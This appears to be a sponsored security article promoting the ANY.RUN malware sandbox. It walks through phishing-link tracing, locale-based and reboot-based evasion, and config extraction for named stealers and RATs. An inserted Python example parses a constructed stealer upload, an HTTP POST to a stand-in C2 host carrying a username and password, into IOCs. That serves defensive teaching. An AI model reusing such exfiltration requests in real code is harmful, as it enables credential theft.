5 use cases with a malware sandbox - Help Net Security

Malware attacks are now commonplace, executing in minutes and causing damage for weeks or months. Rapid detection and fast, effective incident response are critical in this situation.

Today we will discuss five use cases in which a malware sandbox can help, so you can keep threats out and find out the truth behind insidious files.

What is a malware sandbox?

A company’s security system includes several layers of protection. A sandbox is one of those layers, and a modern security system would be incomplete without it. The tool helps solve digital forensics and incident response tasks.

A malware sandbox is a tool for running suspicious programs in a virtual environment that is isolated from your computer. An interactive service additionally lets you manipulate the analyzed sample and the operating system inside the virtual machine. You can work with a suspicious sample directly, as if you had opened it on your own PC: click, open, restart.

There are situations in which a malicious file or link remains dormant or does not reveal its true nature, and other security tools are insufficient or too time-consuming.

For example, some malware samples only run when certain conditions are met.

  • Banking Trojans may only activate when the user visits a specific online banking website. Thanks to the interactivity, analysts can reproduce that condition and collect more indicators of compromise.
  • Some malware looks for files with specific names or for particular registry keys. Cybersecurity specialists can add them in the sandbox to get more IOCs, check the maldoc language, change the system locale and restart tasks.
  • Working directly with a sample allows testing multiple variants, so analysts get data quickly.

Let’s find out how the tool handles malicious files and links, using the ANY.RUN online malware sandbox.

Use case 1. Follow malicious links and files in real time

The first step when you receive an email with a link or attachment is to stop and do nothing. Then look carefully: spelling mistakes, the sender name, the greeting, the file name. Once you decide it might be a scam, go straight to a sandbox.

Here you can open files and follow links in a completely safe environment, and securely check where a link leads and which files are downloaded, in real time.

If you enter a username and password on a phishing page in the task, you are redirected to the original page with the questionable content, but the data has already been stolen. The sandbox shows where the traffic went and which URL was opened. ANY.RUN intercepts the packets that carry the data stolen and transmitted by malware, including credentials.


Use case 2. Network stream analysis of malicious files and links

Imagine you have a PDF file with an image or text bait. You click a link and get an invitation to download a file with a long name or extra underscores.

Once the file is opened, you have installed malware that can steal sensitive information, or that may be part of a more serious attack such as ransomware.

The network stream example shows how Mass Logger sends the authorization information in clear text. You can copy the domain name, login and password straight from the stream and collect information about the infected systems.
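To show what a defender does with such a cleartext stream, here is an added example (not part of the original article or ANY.RUN's tooling) that parses a constructed HTTP exfiltration request and turns it into actionable IOCs: the C2 host, the gate URL, the credential fields sent in clear, and the victim machine name. The host name, URL path and field names are invented for illustration.

```python
from urllib.parse import parse_qs

# Constructed sample of a cleartext HTTP POST, the kind of network stream a
# sandbox displays when a stealer exfiltrates data. Host, path and field
# values are invented; the ".invalid" TLD guarantees this resolves nowhere.
CAPTURED_STREAM = (
    "POST /gate/upload.php HTTP/1.1\r\n"
    "Host: exfil.example-c2.invalid\r\n"
    "User-Agent: Mozilla/4.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 58\r\n"
    "\r\n"
    "hwid=7A3F-21B0&user=victim01&pass=Winter2023%21&host=WS-04"
)

# Form field names that typically carry credentials in a stealer's upload.
CREDENTIAL_KEYS = {"user", "username", "login", "email", "pass", "password", "pwd"}
# Field names that typically identify the infected machine.
VICTIM_KEYS = {"host", "hostname", "pc", "computer"}


def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def extract_iocs(raw: str) -> dict:
    """Derive blockable/alertable IOCs from a cleartext exfiltration request."""
    req = parse_http_request(raw)
    host = req["headers"].get("host", "")
    fields = parse_qs(req["body"])  # also decodes %XX escapes, e.g. %21 -> "!"
    leaked = {k: v[0] for k, v in fields.items() if k.lower() in CREDENTIAL_KEYS}
    victim = next((v[0] for k, v in fields.items() if k.lower() in VICTIM_KEYS), "")
    return {
        "c2_host": host,                          # for DNS/proxy blocklists
        "gate_url": f"http://{host}{req['path']}",  # for proxy/IDS signatures
        "leaked_fields": leaked,                  # accounts that need a reset
        "infected_host": victim,                  # machine to isolate
    }


if __name__ == "__main__":
    for key, value in extract_iocs(CAPTURED_STREAM).items():
        print(f"{key}: {value}")
```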

Use case 3. Local change analysis

Several malware families stop working if the system lacks a certain language, time zone or currency setting.

In the Raccoon Stealer example, when the Belarus (be-BY) locale was selected, all processes were terminated.

We restart the task and change the locale to United States (en-US). Immediately after detection, activity increases: the Raccoon malware exchanges information over the network and modifies certificate settings.

A simple change of locale produced clear results: in one case the malware does not run, in the other it reveals its malicious properties.


Use case 4. Restart support

Some malware families only enter the active phase after a system reboot to avoid detection. By restarting the operating system with ANY.RUN, analysts can identify a cyber threat, observe malware behavior and collect additional indicators of compromise.

In the Nanocore example, the downloaded executable adds itself to the startup folder and then stops all activity. This simple trick is often used to bypass antivirus detection.

After the y6s2gl.exe process was added to startup, all process activity stopped. But when we reboot the system, the malicious file runs successfully and is detected as Nanocore.

Use case 5. Instant access to analysis and fast results

IT security specialists must react as quickly as possible when an incident occurs; time is of the essence. The first step toward improved security is fast malware analysis results.

The Agent Tesla sample is a malicious file. ANY.RUN provides instant access to analysis: the virtual machine starts immediately, and you can change the analysis vector within the current session.

A specialist monitors the created processes and collects all information in real time.

And here’s a quick analysis: 10 seconds is enough to identify Agent Tesla and extract its configuration data from the dump.


These use cases will help uncover even advanced malware and keep your data safe. Use the promo code and run all files and links in the ANY.RUN online malware sandbox.

Send the promo code “HELPNET” to support@any.run from your business email address and get a 14-day ANY.RUN Premium subscription for free!

Attackers use different strategies and brand names in their campaigns. To quickly identify a scam, you need to review the suspicious content. Don’t fall for malware tricks and don’t trust unknown files and links. Use a sandbox and stay safe.
